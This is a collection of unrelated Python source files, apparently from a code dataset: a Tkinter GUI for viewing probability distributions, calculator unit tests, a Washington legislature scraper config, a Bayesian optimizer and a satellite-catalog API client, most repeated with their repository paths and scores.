self.bwe.config(state='disabled') fitframe.pack(side=RIGHT, fill=BOTH, expand=1) # Bottom Left Frame fdata = LabelFrame(lframe, text='Raw Data', padx=5, pady=5) f1 = Frame(fdata) f2 = Frame(fdata) MyLabel(f1, "Mean", '%.3g' % np.mean(self.data)).frame.pack(side=LEFT, padx=5) MyLabel(f1, "Dev", '%.3g' % np.std(self.data)).frame.pack(side=LEFT, padx=5) MyLabel(f2, "Min", '%.3g' % np.min(self.data)).frame.pack(side=LEFT, padx=5) MyLabel(f2, "Max", '%.3g' % np.max(self.data)).frame.pack(side=LEFT, padx=5) fpdf = LabelFrame(lframe, text='Fitted PDF', padx=5, pady=5) f1.pack(side=TOP, pady = 5, padx = 10, fill=BOTH) f2.pack(side=TOP, pady = 5, padx = 10, fill=BOTH) f1 = Frame(fpdf) f2 = Frame(fpdf) self.entry_min = MyEntry(f2, "Min", StringVar(), '%.3g' % pdf.range[0], callback=self.min_changed) self.entry_max = MyEntry(f2, "Max", StringVar(), '%.3g' % pdf.range[1], callback=self.max_changed) self.label_mean = MyLabel(f1, "Mean", '%.3g' % pdf.mean) self.label_dev = MyLabel(f1, "Dev", '%.3g' % pdf.dev) self.label_mode = MyLabel(f1, "Mode", '%.3g' % pdf.mode) for lab in [self.label_mean, self.label_dev, self.label_mode]: lab.frame.pack(side=LEFT, padx=5) f1.pack(side=TOP, pady = 5, padx = 10, fill=BOTH) f2.pack(side=TOP, pady = 5, padx = 10, fill=BOTH) fdata.pack(side=TOP, fill=BOTH) fpdf.pack(side=TOP, fill=BOTH) if nb and desc: tframe.pack(side=TOP, fill=BOTH, expand=0) cframe.pack(side=LEFT, fill=BOTH, expand=0) lframe.pack(side=LEFT, fill=BOTH, expand=1) rframe.pack(side=RIGHT, fill=BOTH, expand=1) bframe.pack(side=TOP, fill=BOTH, expand=1) def changed(self, fit=None, min=None, max=None, nbins=None, bw=None): #print 'PDF CHANGED %s %s %s %s %s' % (fit, min, max, nbins, bw) if fit != None: self.fit = fit self.binscale.config(state='normal') self.bine.config(state='normal') if self.fit == 'Linear': state = 'disabled' else: state = 'normal' self.bwscale.config(state=state) self.bwe.config(state=state) if min != None: if min == '': self.min = None else: self.min = min if max != None: if max == '': self.max = None else: self.max = max if nbins != None: self.nbins = nbins if bw != None: self.bw = bw if fit != None or bw != None or (self.fit == 'Linear' and nbins != None): self.pdf = ExperimentalPDF(self.data, fit=self.fit, nbins=self.nbins, bw=self.bw, min=self.min, max=self.max, force=1) try: self.line2.remove() except: pass try: for patch in self.line1[2]: patch.remove() except: pass self.a.relim() if self.bars.get(): self.line1 = self.a.hist(self.data, self.nbins, normed=1, facecolor=self.color, alpha=0.2) if self.show.get(): self.line2, = self.a.plot(self.pdf.x, self.pdf.y, self.color, linewidth=3) self.plotframe.update() self.entry_min.update('%.3g' % self.pdf.range[0]) self.entry_max.update('%.3g' % self.pdf.range[1]) self.label_mean.update('%.3g' % self.pdf.mean) self.label_dev.update('%.3g' % self.pdf.dev) self.label_mode.update('%.3g' % self.pdf.mode) def bins_changed(self, val): if isinstance(val, Event): val = int(self.bine.get()) else: val = int(val) if val != self.nbins: #print "bins_changed", val self.bine.delete(0, END) self.bine.insert(0, str(val)) self.changed(nbins=val) def bw_changed(self, val): if isinstance(val, Event): val = self.bwe.get() try: val = float(val) except: if val != 'silverman': val = None kde = gaussian_kde(self.data, bw_method=val) val = kde.factor self.bwscale.set(val) else: val = float(val) if val != self.bw: #print "BW changed from %s to %s" % (self.bw, val) if self.bw == None: self.bw = val else: self.bwe.delete(0, END) self.bwe.insert(0, "%.3g" % val) self.changed(bw=val) def fit_changed(self, val): if val != self.fit: self.changed(fit=val) def cb(self): self.changed() def color_changed(self, color): self.color = color self.changed() if self.nb: self.nb.tab(self.tnum,image=sq_image(color)) self.clab.config(image=sq_image(color)) def popup(self, event): print 'popup' self.menu.post(event.x_root, event.y_root) class ColorPop: def __init__(self, parent, callback): self.callback = callback # create a popup menu self.aMenu = Menu(root, tearoff=0) for color in sq_colors: self.aMenu.add_command(image=sq_image(color), command=lambda c=color: self.callback(c)) # attach popup to frame parent.bind("<Button-1>", self.popup) def popup(self, event): self.aMenu.post(event.x_root, event.y_root) class PdfFrameSimple(PdfFrame): def __init__(self, parent, obj, plotframe, nb=None, color=None, desc=None): #print "PdfFrameSimple Init" self.plotframe = plotframe self.a = plotframe.get_plot() self.nb = nb if nb: self.tnum = color color = self.get_color(color) bframe = Frame(parent) lframe = Frame(bframe, bd=1) rframe = Frame(bframe) self.show = IntVar(value=1) if nb: if desc: tframe = Frame(bframe) Label(tframe, text=desc, font=Font(weight="bold")).pack(fill=X, expand=1) tframe.pack(side=TOP, fill=X, expand=0) c = Checkbutton(lframe, variable=self.show, command=self.cb) c.pack() tool1 = ToolTip(c, follow_mouse=1, text='Show Plot') img = sq_image(color) self.clab = Label(lframe, text=' ', image=img) self.clab.photo = img self.clab.bind("<Button-1>", self.popup) cp = ColorPop(self.clab, callback=self.color_changed) tool2 = ToolTip(self.clab, follow_mouse=1, text='Select Plot Color') self.clab.pack(fill=X, expand=1) if isinstance(obj, PDF): self.par = None self.pdf = obj else: self.par = obj self.pdf = obj.pdf self.min = None self.max = None self.pdf_orig = self.pdf self.color = color self.line2, = self.a.plot(self.pdf.x, self.pdf.y, color=self.color, linewidth=3) # BOTTOM RIGHT frame3 = Frame(rframe) if self.par: frame1 = Frame(rframe) MyLabel(frame1, 'Type', self.par.__class__.__name__, bg='white').frame.pack(side=LEFT, padx=5) self.mean = MyLabel(frame3, "Mean", '%.3g' % self.pdf.mean) self.dev = MyLabel(frame3, "Dev", '%.3g' % self.pdf.dev) self.mode = MyLabel(frame3, "Mode", '%.3g' % self.pdf.mode) for lab in [self.mean, self.dev, self.mode]: lab.frame.pack(side=LEFT, padx=5) self.entry_min = MyEntry(frame3, "Min", StringVar(), '%.3g' % self.pdf.range[0], callback=self.min_changed) self.entry_max = MyEntry(frame3, "Max", StringVar(), '%.3g' % self.pdf.range[1], callback=self.max_changed) if self.par: frame1.pack(side=TOP, anchor='nw', fill=BOTH, expand=1) frame3.pack(side=BOTTOM, anchor='nw', fill=BOTH, expand=1) lframe.pack(side=LEFT, fill=X, expand=0) rframe.pack(side=RIGHT, fill=X, expand=1) bframe.pack(side=TOP, fill=X, expand=0) def cb(self): self.changed() def color_changed(self, color): self.color = color self.changed() if self.nb: self.nb.tab(self.tnum,image=sq_image(color)) self.clab.config(image=sq_image(color)) def popup(self, event): self.menu.post(event.x_root, event.y_root) def changed(self, min=None, max=None): #print 'Parameter Changed %s %s' % (min, max) if min != None: if min == '': self.min = None self.pdf = self.pdf_orig else: self.min = min nsamp = options['pdf']['numpart'] x = np.linspace(min, self.pdf.range[1], nsamp) y = np.interp(x, self.pdf_orig.x, self.pdf_orig.y) self.pdf = PDF(x, y) if max != None: if max == '': self.max = None self.pdf = self.pdf_orig else: self.max = max nsamp = options['pdf']['numpart'] x = np.linspace(self.pdf.range[0], max, nsamp) y = np.interp(x, self.pdf_orig.x, self.pdf_orig.y) self.pdf = PDF(x, y) self.mean.update('%.3g' % self.pdf.mean) self.dev.update('%.3g' % self.pdf.dev) self.mode.update('%.3g' % self.pdf.mode) self.entry_min.update('%.3g' % self.pdf.range[0]) self.entry_max.update('%.3g' % self.pdf.range[1]) try: self.line2.remove() except: pass self.a.relim() if self.show.get(): self.line2, = self.a.plot(self.pdf.x, self.pdf.y, color=self.color, linewidth=3) self.plotframe.update() class TimeFrame: def __init__(self, parent): self.tframe = Frame(parent) TimeFrame.me = weakref.proxy(self) def cleanup(self): try: self.tframe.pack_forget() self.canvas._tkcanvas.pack_forget() del self.canvas del self.f except: pass def plot(self, ext): from tkFileDialog import asksaveasfilename filename = asksaveasfilename(title="Plot to file...", initialfile='%s-response' % self.name, defaultextension='.%s' % ext, filetypes=[(ext.upper(), '*.%s' % ext)]) if not filename: return self.canvas.print_figure(filename) def state(self, st, val, path): self.cleanup() if st != 'RESPONSE': return self.name = os.path.basename(path[:-9]) self.f = plt.figure(figsize=(5, 5)) self.canvas = FigureCanvasTkAgg(self.f, master=self.tframe) self.canvas.get_tk_widget().pack(side=TOP, fill=BOTH, expand=1) self.tframe.pack(side=TOP, fill=BOTH, expand=1) self.canvas._tkcanvas.pack(side='top', fill='both', expand=1) if len(val.params) > 2: ax = Axes3D(self.f, azim=30.0, elev=30.0) ax.text2D(0.5, 0.5,'Cannot plot response functions\nwith more than 2 parameters', horizontalalignment='center', verticalalignment='center', transform = ax.transAxes) elif len(val.params) == 2: labels = CB.get('Labels') ax = Axes3D(self.f, azim=30.0, elev=30.0) val.plot(ax=ax, fig=self.f, title=0, labels=labels) else: self.a = self.f.add_subplot(111) self.a.grid(True) val.plot(fig=self.a) class SurFrame: def __init__(self, parent): self.parent = parent def cleanup(self): try: self.surframe.pack_forget() except: pass def rbf_changed(self, rbfunc): global modified #print "rbf changed to ", rbfunc #print self.val.rbf self.val.rbf = rbfunc del h5[self.path] h5[self.path] = pickle(self.val) # invalidate the pdf pdfpath = self.path[:-len('response')] + 'pdf' samplepath = self.path[:-len('response')] + 'samples' varname = self.path.split('/')[-2] if pdfpath in h5: del h5[pdfpath] if samplepath in h5: del h5[samplepath] # change treeview pdf tag to 'generate' for child in MyApp.app.tree.get_children('psweep'): item = MyApp.app.tree.item(child) if item['text'] == varname: for ch in MyApp.app.tree.get_children(child): item = MyApp.app.tree.item(ch) if item['text'] == 'pdf': MyApp.app.tree.item(ch, tags = ['generate']) modified = True MyApp.state_changed('RESPONSE', self.val, self.path) def state(self, st, val, path): self.cleanup() if st != 'RESPONSE': return if isinstance(val, SampledFunc): self.val = val self.surframe = LabelFrame(self.parent, text="Radial Basis Function") rbfvals = [ "multiquadric", "linear", "cubic", "quintic", "inverse", "gaussian" ] self.rbf = MyCombobox(self.surframe, 'RBF', rbfvals, current=val.rbf, callback=self.rbf_changed) else: self.surframe = LabelFrame(self.parent, text="Surface") # Surface Pane self.eqn = ScrolledText.ScrolledText(self.surframe, height=2, ) self.eqn.insert(END, val.eqn) self.eqn.pack(side=TOP, expand=YES, fill=BOTH, padx=5, pady=5) # RMSE rmsep = val.rmse()[1] if rmsep > 10: bgcolor = 'red' elif rmsep > 5: bgcolor = 'orange' elif rmsep > 2: bgcolor = 'yellow' else: bgcolor = '' self.rmse = MyLabel(self.surframe, value='%.3g%%' % rmsep, text='RMSE', bg=bgcolor) self.rmse.frame.pack(side=TOP, anchor='w', padx=5, pady=5) self.surframe.pack(side=LEFT, fill=BOTH, expand=1) class ParFrame: def __init__(self, parent): self.parent = parent def cleanup(self): try: self.parframe.pack_forget() except: pass def state(self, st, val, path): self.cleanup() if st != 'RESPONSE': return self.parframe = Frame(self.parent) self.parframe.pack(side=LEFT, fill=BOTH, expand=1) # Parameters Table with scrollbar scrollbar = Scrollbar(self.parframe) scrollbar.pack(side=RIGHT, fill=Y) t=ttk.Treeview(self.parframe, yscrollcommand=scrollbar.set, height=len(val.params)) t["columns"]=("desc","pdf") t.column("#0", width=75) t.column("desc", width=100) t.column("pdf", width=400) t.heading("#0", text='Name') t.heading("#1", text='Description') t.heading("#2", text='PDF') for p in val.params: cname = p.__class__.__name__[:-9] pdf_str = '%s [%s - %s] mean=%s dev=%s mode=%s' % (cname, p.pdf.range[0], p.pdf.range[1], p.pdf.mean, p.pdf.dev, p.pdf.mode) t.insert("", "end", text=p.name, values=[p.description, pdf_str]) t.tag_configure("ttk") scrollbar.config(command=t.yview) t.pack(side=TOP, fill=BOTH, expand=YES) class MyApp: def __init__(self, parent, objlist): self.parent = parent parent.protocol('WM_DELETE_WINDOW', self.quit) # contains everything self.container = Frame(self.parent) self.container.pack(fill=BOTH, expand=YES) # top frame self.tframe = Frame(self.container) self.bframe = Frame(self.container) detailframe = None plotframe = PlotFrame(self.tframe) if isinstance(objlist, list): cnote = CNote(self.bframe) for cnum, obj in enumerate(objlist): f = Frame(cnote) PdfFactory(f, obj[0], plotframe, nb=cnote, color=cnum, desc=obj[2]) cnote.add(f, color=cnum, text=obj[1], padding=3) cnote.pack(expand=1, fill=BOTH) else: detailframe = PdfFactory(self.bframe, objlist[0], plotframe) MB(parent, plotframe, detailframe) self.tframe.pack(side=TOP, fill=BOTH, expand=YES) self.bframe.pack(side=LEFT, fill=BOTH, expand=YES) def quit(self): global windows wdw = self.parent if wdw in windows: windows.remove(wdw) if not windows: wdw.quit() wdw.destroy() def show_obj(objlist, compare=0): global root, windows root = Tk() root.withdraw() windows = [] if compare: win = Toplevel() windows.append(win) win.title('PUQ Compare') MyApp(win, objlist) else: for i, obj in enumerate(objlist): win = Toplevel() windows.append(win) try: win.title(namelist[i]) except: win.title(obj[2]) MyApp(win, obj) root.mainloop() # loads python file # returns list [(obj, name, desc), (obj, name, desc), ...] def python_load(fname): sys.path = [os.getcwd()] + sys.path module = os.path.splitext(os.path.split(fname)[1])[0] _temp = __import__(module, globals(), locals(), [], 0) pdflist = [] for name, obj in _temp.__dict__.iteritems(): if isinstance(obj, Parameter): desc = obj.description if desc == name: desc = '' pdflist.append((obj, name, "%s: %s (%s)" % (fname, name, desc))) elif isinstance(obj, PDF): pdflist.append((obj, name, "%s: %s" % (fname, name))) if 'run' in _temp.__dict__: def extract_params(uq,b,c): for pm in uq.params: if pm.description and pm.description != pm.name: pdflist.append((pm, pm.name, ('%s: %s (%s)' % (fname, pm.name, pm.description)))) else: pdflist.append((pm, pm.name, ('%s: %s' % (fname, pm.name)))) _temp.Sweep = extract_params _temp.run() if len(pdflist) == 0: print 'Error: Found no PDFs or Parameters in %s' % fname sys.exit(1) if len(pdflist) == 1: return pdflist while 1: print '\nList PDFs you want displayed, separated by commas.' print '\nFound the following PDFs:' for i, p in enumerate(pdflist): print "%d: %s" % (i, p[1]) num = raw_input("Which one(s) to display? (* for all) ") try: if num == '*': numlist = pdflist else: numlist = map(int, num.split(',')) numlist = [pdflist[x] for x in numlist] break except: print 'Invalid number. Try again.\n' return numlist def get_name_desc(obj, loc): if isinstance(obj, Parameter): name = obj.name desc = obj.description else: name = os.path.splitext(loc)[0] desc = '' return name, desc # returns list [(obj, name, desc), (obj, name, desc), ...] def read_obj(loc): name = None desc = None if loc.startswith('http'): try: obj = NetObj(loc) name, desc = get_name_desc(obj, loc) return [(obj, name, desc)] except: print "Error accessing", loc return [] else: extension = loc.split('.')[-1] if extension == 'json': f = open(loc, 'r') obj = unpickle(f.read()) f.close() name, desc = get_name_desc(obj, loc) return [(obj, name, desc)] elif extension == 'py': return python_load(loc) print "Don't know how to open %s." % loc return [] def read(*args): opt, args = parse_args(list(args)) objlist = [] for arg in args: objs = read_obj(arg) objlist.extend(objs) if objlist: show_obj(objlist, compare=opt.c) def parse_args(args): debug(args) usage = "Usage: puq read [options] [object] ...\n\ where 'object' is a URI, python file, or JSON file\n\ Options:\n\ -c Compare. When two or more objects are given, display them in the same plot.\n\ " parser = OptionParser(usage) parser.add_option("-c", action="store_true", help="Compare plots.") (opt, ar) = parser.parse_args(args=args) return opt, ar if __name__ == "__main__": read(*sys.argv[1:])
0.255065
0.12408
import unittest from Calculator import Calculator from CsvReader import CsvReader class MyTestCase(unittest.TestCase): def setUp(self) -> None: self.calculator = Calculator() def test_instantiate_calculator(self): self.assertIsInstance(self.calculator, Calculator) def test_subtract(self): test_data = CsvReader('/src/Unit Test Subtraction.csv').data for row in test_data: self.assertEqual(self.calculator.Subtraction(row['Value 1'], row['Value 2']), int(row['Result'])) self.assertEqual(self.calculator.result, int(row['Result'])) def test_add(self): test_data = CsvReader('/src/Unit Test Addition.csv').data for row in test_data: self.assertEqual(self.calculator.Addition(row['Value 1'], row['Value 2']), int(row['Result'])) self.assertEqual(self.calculator.result, int(row['Result'])) def test_multiply(self): test_data = CsvReader('/src/Unit Test Multiplication.csv').data for row in test_data: self.assertEqual(self.calculator.Multiply(row['Value 1'], row['Value 2']), int(row['Result'])) self.assertEqual(self.calculator.result, int(row['Result'])) def test_divide(self): test_data = CsvReader('/src/Unit Test Division.csv').data for row in test_data: self.assertEqual(self.calculator.Division(row['Value 1'], row['Value 2']), float(row['Result'])) self.assertEqual(self.calculator.result, float(row['Result'])) def test_square(self): test_data = CsvReader('/src/Unit Test Square.csv').data for row in test_data: self.assertEqual(self.calculator.square(row['Value 1']), float(row['Result'])) self.assertEqual(self.calculator.result, float(row['Result'])) def test_square_root(self): test_data = CsvReader('/src/Unit Test Square Root.csv').data for row in test_data: self.assertEqual(self.calculator.squareroot(row['Value 1']), float(row['Result'])) self.assertEqual(self.calculator.result, float(row['Result'])) def test_results_property(self): self.assertEqual(self.calculator.result, 0) if __name__ == '__main__': unittest.main()
src/CalculatorTests.py
import unittest from Calculator import Calculator from CsvReader import CsvReader class MyTestCase(unittest.TestCase): def setUp(self) -> None: self.calculator = Calculator() def test_instantiate_calculator(self): self.assertIsInstance(self.calculator, Calculator) def test_subtract(self): test_data = CsvReader('/src/Unit Test Subtraction.csv').data for row in test_data: self.assertEqual(self.calculator.Subtraction(row['Value 1'], row['Value 2']), int(row['Result'])) self.assertEqual(self.calculator.result, int(row['Result'])) def test_add(self): test_data = CsvReader('/src/Unit Test Addition.csv').data for row in test_data: self.assertEqual(self.calculator.Addition(row['Value 1'], row['Value 2']), int(row['Result'])) self.assertEqual(self.calculator.result, int(row['Result'])) def test_multiply(self): test_data = CsvReader('/src/Unit Test Multiplication.csv').data for row in test_data: self.assertEqual(self.calculator.Multiply(row['Value 1'], row['Value 2']), int(row['Result'])) self.assertEqual(self.calculator.result, int(row['Result'])) def test_divide(self): test_data = CsvReader('/src/Unit Test Division.csv').data for row in test_data: self.assertEqual(self.calculator.Division(row['Value 1'], row['Value 2']), float(row['Result'])) self.assertEqual(self.calculator.result, float(row['Result'])) def test_square(self): test_data = CsvReader('/src/Unit Test Square.csv').data for row in test_data: self.assertEqual(self.calculator.square(row['Value 1']), float(row['Result'])) self.assertEqual(self.calculator.result, float(row['Result'])) def test_square_root(self): test_data = CsvReader('/src/Unit Test Square Root.csv').data for row in test_data: self.assertEqual(self.calculator.squareroot(row['Value 1']), float(row['Result'])) self.assertEqual(self.calculator.result, float(row['Result'])) def test_results_property(self): self.assertEqual(self.calculator.result, 0) if __name__ == '__main__': unittest.main()
0.635675
0.585397
import lxml.html from billy.utils.fulltext import text_after_line_numbers from .bills import WABillScraper from .legislators import WALegislatorScraper from .committees import WACommitteeScraper from .events import WAEventScraper settings = dict(SCRAPELIB_TIMEOUT=300) metadata = dict( name='Washington', abbreviation='wa', capitol_timezone='America/Los_Angeles', legislature_name='Washington State Legislature', legislature_url='http://www.leg.wa.gov/', chambers = { 'upper': {'name': 'Senate', 'title': 'Senator'}, 'lower': {'name': 'House', 'title': 'Representative'}, }, terms=[ {'name': '2009-2010', 'start_year': 2009, 'end_year': 2010, 'sessions': ['2009-2010']}, {'name': '2011-2012', 'start_year': 2011, 'end_year': 2012, 'sessions': ['2011-2012']}, {'name': '2013-2014', 'start_year': 2013, 'end_year': 2014, 'sessions': ['2013-2014']}, {'name': '2015-2016', 'start_year': 2015, 'end_year': 2016, 'sessions': ['2015-2016']}, ], session_details = { '2009-2010': {'display_name': '2009-2010 Regular Session', '_scraped_name': '2009-10', }, '2011-2012': {'display_name': '2011-2012 Regular Session', '_scraped_name': '2011-12', }, '2013-2014': {'display_name': '2013-2014 Regular Session', '_scraped_name': '2013-14', }, '2015-2016': {'display_name': '2015-2016 Regular Session', '_scraped_name': '2015-16', }, }, feature_flags = ['events', 'subjects', 'capitol_maps', 'influenceexplorer'], capitol_maps=[ {"name": "Floor 1", "url": 'http://static.openstates.org/capmaps/wa/f1.gif' }, {"name": "Floor 2", "url": 'http://static.openstates.org/capmaps/wa/f2.gif' }, {"name": "Floor 3", "url": 'http://static.openstates.org/capmaps/wa/f3.gif' }, {"name": "Floor 4", "url": 'http://static.openstates.org/capmaps/wa/f4.gif' }, ], _ignored_scraped_sessions=['2007-08'], ) def session_list(): from billy.scrape.utils import url_xpath return url_xpath('http://apps.leg.wa.gov/billinfo/', '//td[starts-with(@id, "ctl00_ContentPlaceHolder1_TabControl1")]/text()') def extract_text(doc, data): doc = lxml.html.fromstring(data) text = ' '.join(x.text_content() for x in doc.xpath('//body/p')) return text
openstates/openstates-master/openstates/wa/__init__.py
import lxml.html from billy.utils.fulltext import text_after_line_numbers from .bills import WABillScraper from .legislators import WALegislatorScraper from .committees import WACommitteeScraper from .events import WAEventScraper settings = dict(SCRAPELIB_TIMEOUT=300) metadata = dict( name='Washington', abbreviation='wa', capitol_timezone='America/Los_Angeles', legislature_name='Washington State Legislature', legislature_url='http://www.leg.wa.gov/', chambers = { 'upper': {'name': 'Senate', 'title': 'Senator'}, 'lower': {'name': 'House', 'title': 'Representative'}, }, terms=[ {'name': '2009-2010', 'start_year': 2009, 'end_year': 2010, 'sessions': ['2009-2010']}, {'name': '2011-2012', 'start_year': 2011, 'end_year': 2012, 'sessions': ['2011-2012']}, {'name': '2013-2014', 'start_year': 2013, 'end_year': 2014, 'sessions': ['2013-2014']}, {'name': '2015-2016', 'start_year': 2015, 'end_year': 2016, 'sessions': ['2015-2016']}, ], session_details = { '2009-2010': {'display_name': '2009-2010 Regular Session', '_scraped_name': '2009-10', }, '2011-2012': {'display_name': '2011-2012 Regular Session', '_scraped_name': '2011-12', }, '2013-2014': {'display_name': '2013-2014 Regular Session', '_scraped_name': '2013-14', }, '2015-2016': {'display_name': '2015-2016 Regular Session', '_scraped_name': '2015-16', }, }, feature_flags = ['events', 'subjects', 'capitol_maps', 'influenceexplorer'], capitol_maps=[ {"name": "Floor 1", "url": 'http://static.openstates.org/capmaps/wa/f1.gif' }, {"name": "Floor 2", "url": 'http://static.openstates.org/capmaps/wa/f2.gif' }, {"name": "Floor 3", "url": 'http://static.openstates.org/capmaps/wa/f3.gif' }, {"name": "Floor 4", "url": 'http://static.openstates.org/capmaps/wa/f4.gif' }, ], _ignored_scraped_sessions=['2007-08'], ) def session_list(): from billy.scrape.utils import url_xpath return url_xpath('http://apps.leg.wa.gov/billinfo/', '//td[starts-with(@id, "ctl00_ContentPlaceHolder1_TabControl1")]/text()') def extract_text(doc, data): doc = lxml.html.fromstring(data) text = ' '.join(x.text_content() for x in doc.xpath('//body/p')) return text
0.350199
0.150715
import numpy as np from scipy.stats import norm from scipy.spatial.distance import cdist from .sbom import SBOM class BayesianOptimizer(SBOM): def __init__(self, init_positions, space_dim, opt_para): super().__init__(init_positions, space_dim, opt_para) self.regr = self._opt_args_.gpr self.new_positions = [] def _expected_improvement(self): all_pos_comb_sampled = self.get_random_sample() mu, sigma = self.regr.predict(all_pos_comb_sampled, return_std=True) mu_sample = self.regr.predict(self.X_sample) mu = mu.reshape(-1, 1) sigma = sigma.reshape(-1, 1) mu_sample = mu_sample.reshape(-1, 1) mu_sample_opt = np.max(mu_sample) imp = mu - mu_sample_opt - self._opt_args_.xi Z = np.divide(imp, sigma, out=np.zeros_like(sigma), where=sigma != 0) exp_imp = imp * norm.cdf(Z) + sigma * norm.pdf(Z) exp_imp[sigma == 0.0] = 0.0 return exp_imp def _propose_location(self, nth_iter): self.regr.fit(self.X_sample, self.Y_sample) exp_imp = self._expected_improvement() exp_imp = exp_imp[:, 0] index_best = list(exp_imp.argsort()[::-1]) all_pos_comb_sorted = self.all_pos_comb[index_best] pos_best = [all_pos_comb_sorted[0]] while len(pos_best) < self._opt_args_.skip_retrain(nth_iter): if all_pos_comb_sorted.shape[0] == 0: break dists = cdist(all_pos_comb_sorted, [pos_best[-1]], metric="cityblock") dists_norm = dists / dists.max() bool = np.squeeze(dists_norm > 0.25) all_pos_comb_sorted = all_pos_comb_sorted[bool] if len(all_pos_comb_sorted) > 0: pos_best.append(all_pos_comb_sorted[0]) return pos_best def iterate(self, nth_iter): self._base_iterate(nth_iter) self._sort_() self._choose_next_pos() if nth_iter < self._opt_args_.start_up_evals: pos = self.p_current.move_random() else: if len(self.new_positions) == 0: self.new_positions = self._propose_location(nth_iter) pos = self.new_positions[0] self.p_current.pos_new = pos self.new_positions.pop(0) self.X_sample.append(pos) return pos def evaluate(self, score_new): self.p_current.score_new = score_new self._evaluate_new2current(score_new) self._evaluate_current2best() if self.nth_iter % self._opt_args_.n_neighbours == 0: self.p_current.score_current = self.p_current.score_best self.p_current.pos_current = self.p_current.pos_best self.Y_sample.append(score_new) self.nth_iter += 1
gradient_free_optimizers/sequence_model/bayesian_optimization.py
import numpy as np from scipy.stats import norm from scipy.spatial.distance import cdist from .sbom import SBOM class BayesianOptimizer(SBOM): def __init__(self, init_positions, space_dim, opt_para): super().__init__(init_positions, space_dim, opt_para) self.regr = self._opt_args_.gpr self.new_positions = [] def _expected_improvement(self): all_pos_comb_sampled = self.get_random_sample() mu, sigma = self.regr.predict(all_pos_comb_sampled, return_std=True) mu_sample = self.regr.predict(self.X_sample) mu = mu.reshape(-1, 1) sigma = sigma.reshape(-1, 1) mu_sample = mu_sample.reshape(-1, 1) mu_sample_opt = np.max(mu_sample) imp = mu - mu_sample_opt - self._opt_args_.xi Z = np.divide(imp, sigma, out=np.zeros_like(sigma), where=sigma != 0) exp_imp = imp * norm.cdf(Z) + sigma * norm.pdf(Z) exp_imp[sigma == 0.0] = 0.0 return exp_imp def _propose_location(self, nth_iter): self.regr.fit(self.X_sample, self.Y_sample) exp_imp = self._expected_improvement() exp_imp = exp_imp[:, 0] index_best = list(exp_imp.argsort()[::-1]) all_pos_comb_sorted = self.all_pos_comb[index_best] pos_best = [all_pos_comb_sorted[0]] while len(pos_best) < self._opt_args_.skip_retrain(nth_iter): if all_pos_comb_sorted.shape[0] == 0: break dists = cdist(all_pos_comb_sorted, [pos_best[-1]], metric="cityblock") dists_norm = dists / dists.max() bool = np.squeeze(dists_norm > 0.25) all_pos_comb_sorted = all_pos_comb_sorted[bool] if len(all_pos_comb_sorted) > 0: pos_best.append(all_pos_comb_sorted[0]) return pos_best def iterate(self, nth_iter): self._base_iterate(nth_iter) self._sort_() self._choose_next_pos() if nth_iter < self._opt_args_.start_up_evals: pos = self.p_current.move_random() else: if len(self.new_positions) == 0: self.new_positions = self._propose_location(nth_iter) pos = self.new_positions[0] self.p_current.pos_new = pos self.new_positions.pop(0) self.X_sample.append(pos) return pos def evaluate(self, score_new): self.p_current.score_new = score_new self._evaluate_new2current(score_new) self._evaluate_current2best() if self.nth_iter % self._opt_args_.n_neighbours == 0: self.p_current.score_current = self.p_current.score_best self.p_current.pos_current = self.p_current.pos_best self.Y_sample.append(score_new) self.nth_iter += 1
0.678433
0.36869
__author__ = "<NAME>, <NAME>" __copyright__ = "Copyright 2016, EOSS GmbH" __credits__ = ["<NAME>", "<NAME>"] __license__ = "GPL" __version__ = "1.0.0" __maintainer__ = "<NAME>" __email__ = "<EMAIL>" __status__ = "Production" import ujson import requests from manage import ICatalog from model.plain_models import Catalog_Dataset from shapely.geometry import Polygon from shapely.wkt import dumps as wkt_dumps class EOSSCatalog(ICatalog): """ EOSS Catalog interface """ def __init__(self): self.url = 'http://api.eoss.cloud/catalog/search/result.json' self.headers = {'content-type': 'application/json'} def find(self, platform, aoi, date_start, date_stop, cloud_ratio=1.0): session = requests.Session() session.auth = (None, None) session.stream = True headers = {'content-type': 'application/json'} poly = Polygon(aoi) geometry = wkt_dumps(poly) params = dict() params['clouds'] = int(100 * cloud_ratio) dates = dict() dates['start_date'] = date_start.strftime('%m/%d/%Y') dates['end_date'] = date_stop.strftime('%m/%d/%Y') params['daterange'] = [dates] params['sensors'] = [{'name': platform}] params['areas'] = [{'aoi': geometry}] response = requests.post(self.url, json=ujson.loads(ujson.dumps(params)), auth=session.auth, headers=headers) datasets = set() if response.status_code == requests.codes.ok: result = response.json()['found_dataset'] for r in result: ds = Catalog_Dataset() ds.entity_id = r['entity_id'] ds.acq_time = r['acq_time'] ds.sensor = r['sensor'] ds.tile_identifier = r['tile_identifier'] ds.clouds = r['clouds'] ds.level = r['level'] ds.daynight = r['daynight'] datasets.add(ds) else: print response.text return datasets def register(self, ds): raise Exception('Registering datasets in EOSSCatalog not implemented!!!')
catalog/manage/eosscatalog.py
__author__ = "<NAME>, <NAME>" __copyright__ = "Copyright 2016, EOSS GmbH" __credits__ = ["<NAME>", "<NAME>"] __license__ = "GPL" __version__ = "1.0.0" __maintainer__ = "<NAME>" __email__ = "<EMAIL>" __status__ = "Production" import ujson import requests from manage import ICatalog from model.plain_models import Catalog_Dataset from shapely.geometry import Polygon from shapely.wkt import dumps as wkt_dumps class EOSSCatalog(ICatalog): """ EOSS Catalog interface """ def __init__(self): self.url = 'http://api.eoss.cloud/catalog/search/result.json' self.headers = {'content-type': 'application/json'} def find(self, platform, aoi, date_start, date_stop, cloud_ratio=1.0): session = requests.Session() session.auth = (None, None) session.stream = True headers = {'content-type': 'application/json'} poly = Polygon(aoi) geometry = wkt_dumps(poly) params = dict() params['clouds'] = int(100 * cloud_ratio) dates = dict() dates['start_date'] = date_start.strftime('%m/%d/%Y') dates['end_date'] = date_stop.strftime('%m/%d/%Y') params['daterange'] = [dates] params['sensors'] = [{'name': platform}] params['areas'] = [{'aoi': geometry}] response = requests.post(self.url, json=ujson.loads(ujson.dumps(params)), auth=session.auth, headers=headers) datasets = set() if response.status_code == requests.codes.ok: result = response.json()['found_dataset'] for r in result: ds = Catalog_Dataset() ds.entity_id = r['entity_id'] ds.acq_time = r['acq_time'] ds.sensor = r['sensor'] ds.tile_identifier = r['tile_identifier'] ds.clouds = r['clouds'] ds.level = r['level'] ds.daynight = r['daynight'] datasets.add(ds) else: print response.text return datasets def register(self, ds): raise Exception('Registering datasets in EOSSCatalog not implemented!!!')
0.512693
0.072047
